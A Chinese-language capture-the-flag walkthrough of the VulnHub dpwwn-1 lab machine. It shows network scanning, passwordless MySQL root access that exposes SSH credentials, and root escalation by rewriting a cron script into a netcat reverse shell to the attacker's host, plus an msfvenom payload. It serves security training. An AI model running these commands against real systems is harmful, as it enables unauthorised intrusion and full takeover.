ARTICLE DETAIL

资讯详情

深耕网站视觉设计与运营推广的一线实战洞察。

VulnHub 系列:dpwwn, 1-Walkthrough

VulnHub 系列:dpwwn, 1-Walkthrough 一、信息收集靶机 IP192.168.152.131nmap -sP 192.168.152.0/24端口和服务nmap -sS -sV -T5 -A -p- 192.168.152.131页面、目录枚举dirb http://192.168.152.131 -X .php,.txt,.zip,.htmlpython3 /home/kali/Downloads/dirsearch/dirsearch.py -u http://192.168.152.131 -e .php,.txt,.zip,.htmlgobuster dir -u http://192.168.152.131 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.zip访问网址http://192.168.152.131/info.php​​​​​从 phpinfo 里面可以收集到的信息• 系统信息Linux dpwwn-01 3.10.0-957.el7.centos.plus.i686• PHP 版本信息5.4.16• webroot 目录/var/www/html• allowurlfopenon和 allowurlincludeoff• asp_tagsoff• extension_dir/usr/lib/php/modules• disable_functionsno value• open_basedirno value• libxml 版本2.9.1searchsploit php 5.4searchsploit apache 2.4二、MySQL 未授权访问基本上已经对现有信息挨个进行了尝试除了 MySQL。这个时候就得考虑一下我们有什么又可以做什么只要有可能性就值得去尝试。 尝试登录 MySQL 一下试试因为不知道密码所以输入密码的地方直接回车结 果进去了。mysql -h 192.168.152.131 -u root -p发现有一个数据库叫 ssh随后发现了用户名和密码。show databases; use ssh; show tables; select * from users;在kali机上使用 mistic/testP$$swordmistic 登录 ssh。ssh mistic192.168.152.131三、提权关于 Linux 提权可以直接用脚本搜集一下对于提权有用的信息比如用 linuxprivchecker.py、LinEnum.sh。先在 kali 上开启 HTTP 服务python3 -m http.server 65534使用curl 下载 linuxprivchecker.py 脚本到靶机的 tmp目录。curl -O http://192.168.152.128:65534/home/kali/Downloads/linuxprivchecker.py为了便于查看收集到的信息将结果输出到 report.txt 文本中python linuxprivchecker.py report.txt靶机做了这些后发现还是手动收集更快手动收集不到有效信息的情况下再尝 试用脚本。SUID 权限可执行文件没有可用的find / -perm -us -type f 2/dev/null当前用户可写文件发现一堆但是极大多数都是没用的所以我先把结果输出到 文本文件然后使用 grep 加上关键字去筛选。find / -writable -type f 2/dev/null /tmp/report.txt grep -Ev /proc|/sys /tmp/report.txt查看计划任务发现 logrot.sh 这个脚本每三分钟执行一次以 root 权限执行。cat /home/mistic/logrot.shcat /etc/crontab修改/home/mistic/logrot.sh 的内容为反弹 shellecho -e #!/bin/bash\nmkfifo /tmp/mqel; nc 192.168.152.128 1234 0/tmp/mqel | /bin/sh /tmp/mqel 21; rm /tmp/mqel /home/mistic/logrot.shcat /home/mistic/logrot.sh在kali机上执行以下代码msfvenom -p cmd/unix/reverse_netcat LHOST192.168.152.128 LPORT1234kali 上使用 nc 监听 1234 端口等待计划任务的执行3分钟。id hostname cd /root ls -l cat dpwwn-01-FLAG.txt
返回列表